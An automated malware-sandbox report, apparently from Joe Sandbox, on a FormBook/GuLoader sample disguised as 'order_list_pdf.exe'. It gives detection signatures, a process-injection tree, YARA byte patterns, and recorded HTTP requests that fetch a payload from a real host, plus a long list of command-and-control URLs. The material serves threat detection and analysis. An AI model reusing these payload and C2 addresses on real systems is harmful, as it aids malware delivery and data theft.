Loading ...

Play interactive tourEdit tour

Analysis Report order_list_pdf.exe

Overview

General Information

Sample Name:order_list_pdf.exe
Analysis ID:246514
MD5:1cdb3e9a718706655bdf8337cc0745aa
SHA1:a00c20391b1d7cc9e78d9ac1ea8c20c8151dc491
SHA256:467188d082df27c66676757668738a51c3c5727ebc09031d1eac8ead8289b5cc

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • order_list_pdf.exe (PID: 3644 cmdline: 'C:\Users\user\Desktop\order_list_pdf.exe' MD5: 1CDB3E9A718706655BDF8337CC0745AA)
    • order_list_pdf.exe (PID: 4496 cmdline: 'C:\Users\user\Desktop\order_list_pdf.exe' MD5: 1CDB3E9A718706655BDF8337CC0745AA)
      • explorer.exe (PID: 3024 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • autoconv.exe (PID: 1408 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: DA2CA3F51A68447F78C6F6BE53AF1BC0)
        • help.exe (PID: 3908 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 1520 cmdline: /c del 'C:\Users\user\Desktop\order_list_pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x157d9:$sqlite3step: 68 34 1C 7B E1
    • 0x158ec:$sqlite3step: 68 34 1C 7B E1
    • 0x15808:$sqlite3text: 68 38 2A 90 C5
    • 0x1592d:$sqlite3text: 68 38 2A 90 C5
    • 0x1581b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x15943:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x74c2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x12b55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x12641:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x12c57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x12dcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x804a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x118bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x89e3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x17ec7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x18eca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.842795531.00000000036BE000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x2140:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000004.00000002.672129627.000000001DE50000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 16 entries

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for domain / URLShow sources
      Source: http://www.regulars5.comVirustotal: Detection: 6%Perma Link
      Source: http://www.regulars5.com/kms8/Virustotal: Detection: 6%Perma Link
      Multi AV Scanner detection for submitted fileShow sources
      Source: order_list_pdf.exeVirustotal: Detection: 59%Perma Link
      Source: order_list_pdf.exeMetadefender: Detection: 13%Perma Link
      Source: order_list_pdf.exeReversingLabs: Detection: 58%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.672129627.000000001DE50000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.839035767.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.839087655.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.839147457.0000000000B60000.00000004.00000001.sdmp, type: MEMORY
      Source: global trafficHTTP traffic detected: GET /kms8/?apuPip=Y2JhzpXP&qb4tMX=DXkzu0J/rYE3zqsuL8zi26zQMZt425xXsgfCpDmfzAdnLXrajI+t3zm9a4sWgfiT0xno HTTP/1.1Host: www.nicromanelli.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /wp-/bin_iwlTOFWjHT250.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.echipamenteacvarii.roCache-Control: no-cache
      Source: C:\Windows\explorer.exeCode function: 5_2_05FFA5A2 getaddrinfo,setsockopt,recv,5_2_05FFA5A2
      Source: global trafficHTTP traffic detected: GET /wp-/bin_iwlTOFWjHT250.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.echipamenteacvarii.roCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /kms8/?apuPip=Y2JhzpXP&qb4tMX=DXkzu0J/rYE3zqsuL8zi26zQMZt425xXsgfCpDmfzAdnLXrajI+t3zm9a4sWgfiT0xno HTTP/1.1Host: www.nicromanelli.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: www.echipamenteacvarii.ro
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Jul 2020 15:04:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 45013Connection: closeServer: Apache/2X-Powered-By: PHP/5.5.22Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-transform, no-cache, no-store, must-revalidateLink: <http://www.anthonyromanelli.com/i/wp-json/>; rel="https://api.w.org/"Accept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 61 6e 74 68 6f 6e 79 72 6f 6d 61 6e 65 6c 6c 69 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 61 6e 74 68 6f 6e 79 72 6f 6d 61 6e 65 6c 6c 69 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 61 6e 74 68 6f 6e 79 72 6f 6d 61 6e 65 6c 6c 69 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 6e 74 68 6f 6e 79 72 6f 6d 61 6e 65 6c 6c 69 2e 63 6f 6d 2f 69 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 61 6e 74 68 6f 6e 79 72 6f 6d 61 6e 65 6c 6c 69 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 6e 74 68 6f 6e 79 72 6f 6d 61 6e 65 6c 6c 69 2e 63 6f 6d 2f 69 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 31 2e 32 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a
      Source: order_list_pdf.exe, 00000004.00000002.665507432.00000000009B5000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupacvarii.ro/wp-/bin_iwlTOFWjHT250.bin
      Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: explorer.exe, 00000005.00000002.843406993.00000000034B0000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado
      Source: explorer.exe, 00000005.00000002.843992126.00000000036C0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000005.00000000.648081645.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.barzlab.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.barzlab.com/kms8/
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.barzlab.com/kms8/www.savehebron.red
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.barzlab.comReferer:
      Source: explorer.exe, 00000005.00000000.648081645.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.cuadpro.net
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.cuadpro.net/kms8/
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.cuadpro.net/kms8/www.rockstarbonus.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.cuadpro.netReferer:
      Source: order_list_pdf.exe, 00000004.00000002.665507432.00000000009B5000.00000004.00000020.sdmpString found in binary or memory: http://www.echipamenteacvarii.ro/
      Source: order_list_pdf.exe, 00000004.00000003.663871178.00000000009C4000.00000004.00000001.sdmp, order_list_pdf.exe, 00000004.00000002.665443045.0000000000987000.00000004.00000020.sdmpString found in binary or memory: http://www.echipamenteacvarii.ro/wp-/bin_iwlTOFWjHT250.bin
      Source: order_list_pdf.exe, 00000004.00000002.665443045.0000000000987000.00000004.00000020.sdmpString found in binary or memory: http://www.echipamenteacvarii.ro/wp-/bin_iwlTOFWjHT250.binN
      Source: order_list_pdf.exe, 00000004.00000002.665443045.0000000000987000.00000004.00000020.sdmpString found in binary or memory: http://www.echipamenteacvarii.ro/wp-/bin_iwlTOFWjHT250.binamG
      Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.goldentouch.online
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.goldentouch.online/kms8/
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.goldentouch.online/kms8/www.barzlab.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.goldentouch.onlineReferer:
      Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.html5technologies.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.html5technologies.com/kms8/
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.html5technologies.com/kms8/www.mortab.net
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.html5technologies.comReferer:
      Source: explorer.exe, 00000005.00000000.648081645.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.lyonpendule.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.lyonpendule.com/kms8/
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.lyonpendule.com/kms8/u7Q
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.lyonpendule.comReferer:
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.mortab.net
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.mortab.net/kms8/
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.mortab.net/kms8/www.syxauto.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.mortab.netReferer:
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.nicromanelli.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.nicromanelli.com/kms8/
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.nicromanelli.com/kms8/www.cuadpro.net
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.nicromanelli.comReferer:
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.regulars5.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.regulars5.com/kms8/
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.regulars5.com/kms8/www.lyonpendule.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.regulars5.comReferer:
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.rockstarbonus.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.rockstarbonus.com/kms8/
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.rockstarbonus.com/kms8/www.voyalo.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.rockstarbonus.comReferer:
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.safetraffic2upgrades.download
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.safetraffic2upgrades.download/kms8/
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.safetraffic2upgrades.download/kms8/www.stevenranellone.net
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.safetraffic2upgrades.downloadReferer:
      Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000005.00000000.648081645.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.savehebron.red
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.savehebron.red/kms8/
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.savehebron.red/kms8/www.safetraffic2upgrades.download
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.savehebron.redReferer:
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.spartanbulk.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.spartanbulk.com/kms8/
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.spartanbulk.com/kms8/www.html5technologies.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.spartanbulk.comReferer:
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.stevenranellone.net
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.stevenranellone.net/kms8/
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.stevenranellone.net/kms8/www.xiaochenshuiwu.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.stevenranellone.netReferer:
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.syxauto.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.syxauto.com/kms8/
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.syxauto.com/kms8/www.goldentouch.online
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.syxauto.comReferer:
      Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.648081645.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000005.00000002.876315572.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.voyalo.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.voyalo.com/kms8/
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.voyalo.com/kms8/www.spartanbulk.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.voyalo.comReferer:
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.xiaochenshuiwu.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.xiaochenshuiwu.com/kms8/
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.xiaochenshuiwu.com/kms8/www.regulars5.com
      Source: explorer.exe, 00000005.00000002.844185530.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://www.xiaochenshuiwu.comReferer:
      Source: explorer.exe, 00000005.00000000.648081645.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.672129627.000000001DE50000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.839035767.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.839087655.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.839147457.0000000000B60000.00000004.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.842795531.00000000036BE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000004.00000002.672129627.000000001DE50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.672129627.000000001DE50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.839035767.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.839035767.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.839087655.0000000000B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.839087655.0000000000B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.839927203.0000000002CCC000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000007.00000002.839147457.0000000000B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.839147457.0000000000B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: order_list_pdf.exe
      Source: initial sampleStatic PE information: Filename: order_list_pdf.exe
      Source: C:\Users\user\Desktop\order_list_pdf.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_020983FD NtResumeThread,0_2_020983FD
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_02096054 NtWriteVirtualMemory,0_2_02096054
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_02093E09 NtSetInformationThread,TerminateProcess,CreateFileA,0_2_02093E09
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_020906B7 EnumWindows,NtSetInformationThread,TerminateProcess,0_2_020906B7
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_02097EEB NtProtectVirtualMemory,0_2_02097EEB
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_02093721 NtSetInformationThread,TerminateProcess,0_2_02093721
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_020914C3 NtSetInformationThread,TerminateProcess,0_2_020914C3
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_02098A07 NtResumeThread,0_2_02098A07
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0209321B NtWriteVirtualMemory,0_2_0209321B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_02091313 NtSetInformationThread,TerminateProcess,0_2_02091313
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_02093B3E NtSetInformationThread,TerminateProcess,0_2_02093B3E
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0209336B NtWriteVirtualMemory,0_2_0209336B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_02091B6A NtSetInformationThread,TerminateProcess,0_2_02091B6A
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_020988AC NtResumeThread,0_2_020988AC
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_020930E0 NtWriteVirtualMemory,0_2_020930E0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0209391D NtSetInformationThread,TerminateProcess,0_2_0209391D
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_020969C0 NtWriteVirtualMemory,0_2_020969C0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_02092E79 NtWriteVirtualMemory,0_2_02092E79
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_02098677 NtResumeThread,0_2_02098677
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_02090E94 NtSetInformationThread,TerminateProcess,0_2_02090E94
